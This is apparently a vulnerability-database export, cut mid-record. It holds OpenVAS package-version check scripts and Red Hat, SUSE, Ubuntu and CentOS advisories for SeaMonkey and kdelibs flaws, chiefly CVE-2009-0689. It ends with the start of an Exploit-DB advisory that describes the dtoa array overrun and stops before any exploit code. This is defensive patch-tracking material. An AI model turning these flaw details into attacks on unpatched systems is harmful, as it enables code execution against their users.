processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. 
After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66121", "href": "http://plugins.openvas.org/nasl.php?oid=66121", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1531", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1531.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1531 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. 
(CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. 
To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66121);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-3274\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3380\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1531\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1531.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", 
rpm:\"seamonkey-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", 
rpm:\"seamonkey-mail~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. 
A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066121", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066121", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1531", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1531.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1531 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. 
(CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66121\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-3274\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3380\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1531\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1531.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += 
res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66530", "href": "http://plugins.openvas.org/nasl.php?oid=66530", "type": "openvas", "title": "SLES11: Security update for kdelibs3", "sourceData": "#\n#VID 5d7c99e519a95f9108d35c51b0c854c5\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for kdelibs3\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=557126\");\n script_id(66530);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES11: Security update for kdelibs3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kdelibs3\", rpm:\"kdelibs3~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs3-default-style\", rpm:\"kdelibs3-default-style~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066530", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066530", "type": "openvas", "title": "SLES11: Security update for kdelibs3", "sourceData": "#\n#VID 5d7c99e519a95f9108d35c51b0c854c5\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for kdelibs3\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=557126\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.66530\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES11: Security update for kdelibs3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kdelibs3\", rpm:\"kdelibs3~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs3-default-style\", rpm:\"kdelibs3-default-style~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:24:04", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "A buffer overflow was found in the KDE libraries when converting a string \nto a floating point number. If a user or application linked against kdelibs \nwere tricked into processing crafted input, an attacker could cause a \ndenial of service (via application crash) or possibly execute arbitrary \ncode with the privileges of the user invoking the program. (CVE-2009-0689)\n\nIt was discovered that the KDE libraries could use KHTML to process an \nunknown MIME type. 
If a user or application linked against kdelibs were \ntricked into opening a crafted file, an attacker could potentially trigger \nXMLHTTPRequests to remote sites.", "edition": 5, "modified": "2009-12-11T00:00:00", "published": "2009-12-11T00:00:00", "id": "USN-871-1", "href": "https://ubuntu.com/security/notices/USN-871-1", "title": "KDE vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:26:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1601\n\n\nThe kdelibs packages provide libraries for the K Desktop Environment (KDE).\n\nA buffer overflow flaw was found in the kdelibs string to floating point\nconversion routines. A web page containing malicious JavaScript could crash\nKonqueror or, potentially, execute arbitrary code with the privileges of the\nuser running Konqueror. (CVE-2009-0689)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. 
The desktop must be restarted (log out, then\nlog back in) for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028372.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028373.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028374.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028375.html\n\n**Affected packages:**\nkdelibs\nkdelibs-apidocs\nkdelibs-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1601.html", "edition": 3, "modified": "2009-11-27T23:09:54", "published": "2009-11-25T14:52:10", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/028372.html", "id": "CESA-2009:1601", "title": "kdelibs security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T12:00:08", "description": "KDE KDELibs 4.3.3 Remote Array Overrun. CVE-2009-0689. 
Dos exploit for linux platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "KDE KDELibs 4.3.3 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10184", "href": "https://www.exploit-db.com/exploits/10184/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\r\nin dtoa.cpp file\r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\r\nit is possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. 
